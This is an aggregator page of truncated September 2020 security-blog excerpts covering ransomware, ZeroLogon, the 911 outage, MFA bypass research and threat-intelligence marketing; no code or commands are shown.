Posts

Showing posts from September, 2020

Recorded Future - What to Expect at Predict 2020

On October 5 – 8, 2020, more than 5,000 security professionals from the most influential organizations and governments around the globe will attend the security intelligence event of the year — Predict . We hope you’re planning to join, as well! Recorded Future clients, partners, and anyone interested in using intelligence to disrupt the status quo won’t want to miss a minute of the exclusive thought leadership, education, networking, and fun we have in store for you! Check out the full agenda and register now . What’s Happening at Predict 2020 Join us at Predict next week to find out how security intelligence is being used to defend organizations and infrastructures against threat actors. You’ll hear directly from the security leaders and luminaries who are shaping the future of cybersecurity, and you’ll experience the incredible power a comprehensive security intelligence strategy brings to the organizations that adopt it. This year, Predict is an online event focused on usin...

Schneier - Negotiating with Ransomware Gangs

Really interesting conversation with someone who negotiates with ransomware gangs: For now, it seems that paying ransomware, while obviously risky and empowering/encouraging ransomware attackers, can perhaps be comported so as not to break any laws (like anti-terrorist laws, FCPA, conspiracy and others) ­ and even if payment is arguably unlawful, seems unlikely to be prosecuted. Thus, the decision whether to pay or ignore a ransomware demand, seems less of a legal, and more of a practical, determination ­ almost like a cost-benefit analysis. The arguments for rendering a ransomware payment include: Payment is the least costly option; Payment is in the best interest of stakeholders (e.g. a hospital patient in desperate need of an immediate operation whose records are locked up); Payment can avoid being fined for losing important data; Payment means not losing highly confidential information; and Payment may mean not going public with the data breach. The arguments against re...

SANS - Issue #77 - Volume XXII - SANS Newsbites - September 29th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/77

Krebs - Who’s Behind Monday’s 14-State 911 Outage?

Image
Emergency 911 systems were down for more than an hour on Monday in towns and cities across 14 U.S. states. The outages led many news outlets to speculate the problem was related to Microsoft ‘s Azure web services platform, which also was struggling with a widespread outage at the time. However, multiple sources tell KrebsOnSecurity the 911 issues stemmed from some kind of technical snafu involving Intrado and Lumen , two companies that together handle 911 calls for a broad swath of the United States. Image: West.com On the afternoon of Monday, Sept. 28, several states including Arizona, California, Colorado, Delaware, Florida, Illinois, Indiana, Minnesota, Nevada, North Carolina, North Dakota, Ohio, Pennsylvania and Washington reported 911 outages in various cities and localities. Multiple news reports suggested the outages might have been related to an ongoing service disruption at Microsoft. But a spokesperson for the software giant told KrebsOnSecurity, “we’ve seen no indicat...

Recorded Future - How Security Intelligence Protects Sensitive Retail Data

Image
Neiman Marcus… Target… Home Depot… Panera Bread… Macy’s: These retailers are among the most famous brands that have suffered major cyberattacks . It doesn’t end there. Just recently, fashion brand H&M apologized and could face a fine of close to $1 billion for data protection breaches that involved illegally stored employee data. Defending Data and Digital Assets: A Major Challenge for Retailers One reason why retailers are frequently victimized by cyberattacks is because they must cater to a large customer base of connected consumers. Those customers are not always savvy when it comes to protecting log-in credentials. Any customer that provides a cybercriminal with an easy entryway to a retailer’s website or mobile app just might make that retailer’s digital assets vulnerable to a full-blown cyberattack. Retail organizations process high volumes of financial transactions and store customer data in multiple databases, as well. In addition, retailers deploy many endpoints throug...

Black Hills InfoSec - Exploiting MFA Inconsistencies on Microsoft Services

Beau Bullock // Overview On offensive engagements, such as penetration tests and red team assessments, I have been seeing inconsistencies in how MFA is applied to the various Microsoft services. Across Microsoft 365 and Azure, there are multiple endpoints. These endpoints can all be configured under different Conditional Access policy settings, which sometimes lead to […] The post Exploiting MFA Inconsistencies on Microsoft Services appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/exploiting-mfa-inconsistencies-on-microsoft-services/

TrustedSec - Setting the ‘Referer’ Header Using JavaScript

Image
Or, “I’m Sorry, You Said You’re from Where Again?” In a prior webinar on creating weaponized Cross-Site Scripting (XSS) payloads, I mentioned that XSS payloads (written in JavaScript) could not change the HTTP Referer header. Malicious requests made through an XSS payload will often have an unexpected Referer header that does not generally make sense in the normal workflow of the application. Fortunately, the application used in that particular demonstration was not checking the Referer header. Our malicious payload worked even though the Referer was wildly incorrect. It turns out that I lied to you dear readers—not intentionally of course. Figure 1 – I Was Wrong! It turns out that you can, in fact, set the Referer header using JavaScript with a simple trick that I was not aware of at the time. But let’s backup a second. What is this Referer header, and why do I keep misspelling it? The Referer header is set by your browser and sent to the server when you request a p...

Schneier - Hacking a Coffee Maker

As expected, IoT devices are filled with vulnerabilities : As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord. […] In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — ­and possibly other appliances made by Smarter — ­to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss. from Schneier on Security https://www.schneier.com/blog/ar...

Recorded Future - Delivering Maximum Impact in the Public Sector

Our guest is Michael Anderson, chief information security officer for Dallas County — the eighth largest county in the United States. He oversees the IT security program for over 6,800 county employees and the electronic records for over 2.6 million residents. Michael shares his career journey, including 10 years served in the Army in the Intelligence Corp, and over 20 years of strategic and tactical expertise across a wide-range of IT disciplines. We’ll find out how he and his team use modern tools to make the most of limited resources, the type of leadership style he uses to inspire and motivate his coworkers, and how he approaches hiring in a highly competitive jobs market. This podcast was produced in partnership with the CyberWire . The post Delivering Maximum Impact in the Public Sector appeared first on Recorded Future . from Recorded Future https://www.recordedfuture.com/podcast-episode-177/

Schneier - On Executive Order 12333

Mark Jaycox has written a long article on the US Executive Order 12333: “ No Oversight, No Limits, No Worries: A Primer on Presidential Spying and Executive Order 12,333 “: Abstract : Executive Order 12,333 (“EO 12333”) is a 1980s Executive Order signed by President Ronald Reagan that, among other things, establishes an overarching policy framework for the Executive Branch’s spying powers. Although electronic surveillance programs authorized by EO 12333 generally target foreign intelligence from foreign targets, its permissive targeting standards allow for the substantial collection of Americans’ communications containing little to no foreign intelligence value. This fact alone necessitates closer inspection. This working draft conducts such an inspection by collecting and coalescing the various declassifications, disclosures, legislative investigations, and news reports concerning EO 12333 electronic surveillance programs in order to provide a better understanding of how the Execut...

SANS - Issue #76 - Volume XXII - SANS Newsbites - September 25th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/76

Schneier - Friday Squid Blogging: COVID-19 Found on Chinese Squid Packaging

I thought the virus doesn’t survive well on food packaging : Authorities in China’s northeastern Jilin province have found the novel coronavirus on the packaging of imported squid, health authorities in the city of Fuyu said on Sunday, urging anyone who may have bought it to get themselves tested. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered. Read my blog posting guidelines here . from Schneier on Security https://www.schneier.com/blog/archives/2020/09/friday-squid-blogging-covid-19-found-on-chinese-squid-packaging.html

Krebs - Who is Tech Investor John Bernard?

Image
John Bernard , the subject of a story here last week about a self-proclaimed millionaire investor who has bilked countless tech startups , appears to be a pseudonym for John Clifton Davies , a U.K. man who absconded from justice before being convicted on multiple counts of fraud in 2015. Prior to his conviction, Davies served 16 months in jail before being cleared of murdering his wife on their honeymoon in India. The Private Office of John Bernard , which advertises itself as a capital investment firm based in Switzerland, has for years been listed on multiple investment sites as the home of a millionaire who made his fortunes in the dot-com boom 20 years ago and who has oodles of cash to invest in tech startups. But as last week’s story noted, Bernard’s investment company is a bit like a bad slot machine that never pays out. KrebsOnSecurity interviewed multiple investment brokers who all told the same story: After promising to invest millions after one or two phone calls and with ...

Schneier - CEO of NS8 Charged with Securities Fraud

The founder and CEO of the Internet security company NS8 has been arrested and “charged in a Complaint in Manhattan federal court with securities fraud, fraud in the offer and sale of securities, and wire fraud.” I admit that I’ve never even heard of the company before. from Schneier on Security https://www.schneier.com/blog/archives/2020/09/ceo-of-ns8-charged-with-securities-fraud.html

Krebs - Microsoft: Attackers Exploiting ‘ZeroLogon’ Windows Flaw

Image
Microsoft warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in Windows Server systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft’s warning comes just days after the U.S. Department of Homeland Security issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest. DHS’s Cybersecurity and Infrastructure Agency (CISA) said in the directive that it expected imminent exploitation of the flaw — CVE-2020-1472 and dubbed “ZeroLogon” — because exploit code which can be used to take advantage of it was circulating online . Last night, Microsoft’s Security Intelligence unit tweeted that the company is “tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability.” “We have observed attacks where public exploits have been incorporated into attacker playbooks,” Microsoft said. “We strongly recommend c...

HACKMAGEDDON - July 2020 Cyber Attacks Statistics

It's time to publish the statistics derived from the cyber attacks timeline of July (part I and part II). As previously mentioned this month has been characterized by ransomware (throughout the entire period, but we are used to it), and mega breaches, a trend that resurrected in the second part of the month. Easily predictable the two characterize the statistics of the month. from HACKMAGEDDON https://www.hackmageddon.com/2020/09/24/july-2020-cyber-attacks-statistics/

Recorded Future - Defend Your Physical Assets With Geopolitical Intelligence

Physical security teams and all-source analysts must continuously monitor for and report on new geopolitical event findings in real-time to effectively protect their organizations and assets. They need to respond swiftly to threats, but organizations are still susceptible to being blindsided at the most inopportune times because intelligence often lags. Relying on disparate data sources and manual processes means insights are often incomplete or outdated. Most analysts spend too much time manually collecting, analyzing, and visualizing a vast amount of intelligence — not to mention translating information from news sources in these regions’ local languages. To prevent and respond to geopolitical threats, teams need a more efficient and collaborative way to report on relevant insights that drive faster response times and informed decision-making. Geopolitical Intelligence in Action To effectively monitor geopolitical risks, open source and all-source analysts need geopolitical inte...

Schneier - Iranian Government Hacking Android

The New York Times wrote about a still-unreleased report from Chckpoint and the Miaan Group: The reports, which were reviewed by The New York Times in advance of their release, say that the hackers have successfully infiltrated what were thought to be secure mobile phones and computers belonging to the targets, overcoming obstacles created by encrypted applications such as Telegram and, according to Miaan, even gaining access to information on WhatsApp. Both are popular messaging tools in Iran. The hackers also have created malware disguised as Android applications, the reports said. It looks like the standard technique of getting the victim to open a document or application. from Schneier on Security https://www.schneier.com/blog/archives/2020/09/iranian-government-hacking-android.html

Krebs - Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack

Image
Tyler Technologies , a Texas-based company that bills itself as the largest provider of software and technology services to the United States public sector, is battling a network intrusion that has disrupted its operations. The company declined to discuss the exact cause of the disruption, but their response so far is straight out of the playbook for responding to ransomware incidents. Plano, Texas-based Tyler Technologies [ NYSE:TYL ] has some 5,300 employees and brought in revenues of more than $1 billion in 2019. It sells a broad range of services to state and local governments, including appraisal and tax software, integrated software for courts and justice agencies, enterprise financial software systems, public safety software, records/document management software solutions and transportation software solutions for schools. Earlier today, the normal content on tylertech.com was replaced with a notice saying the site was offline. In a statement provided to KrebsOnSecurity after...

TrustedSec - Azure Account Hijacking using mimikatz’s lsadump::setntlm

Image
Not long ago, I was on an engagement where the client made use of a hybrid Office 365 environment. In their setup, authentication credentials were managed by the on-premises Active Directory (AD) Domain Controller and then synced to Azure AD via Azure AD Connect. We were tasked with gaining access to sensitive customer information. And while we were able to obtain domain administrative privileges, we had a difficult time finding exactly where the target information resided. Normally in these instances, we research the employees of the organization, attempt to understand who they are, what roles they play, and how they operate from a day to day perspective. And while we were able to identify several key employees, we ran into two (2) problems: 1) the users did not store client data on their assigned working device and 2) the organization used cloud-based Office products to store client data, such as OneDrive, SharePoint, etc. Unfortunately, the users I targeted had chosen strong pass...

Recorded Future - 4 Things Nobody Tells You About Security Intelligence

Threat intelligence has huge potential to help organizations make better security decisions and reduce cyber risk. However, intelligence and security teams are often siloed, and intelligence outputs can lack relevance to the audiences they serve. As a result, the response to intelligence can be slow — if it comes at all. This is where elite security intelligence comes in. Security intelligence is the application of intelligence across the security function . It empowers organizations to realize operational improvements and reduce cyber risk by embedding intelligence into security their workflows . To shed some light on what security intelligence means for your organization, we asked senior leaders from Recorded Future to identify some things that most people don’t realize about security intelligence. #1 Security Intelligence Gives You Superpowers Most people in operational and leadership positions make decisions based on their own expertise and experience. They rarely have acc...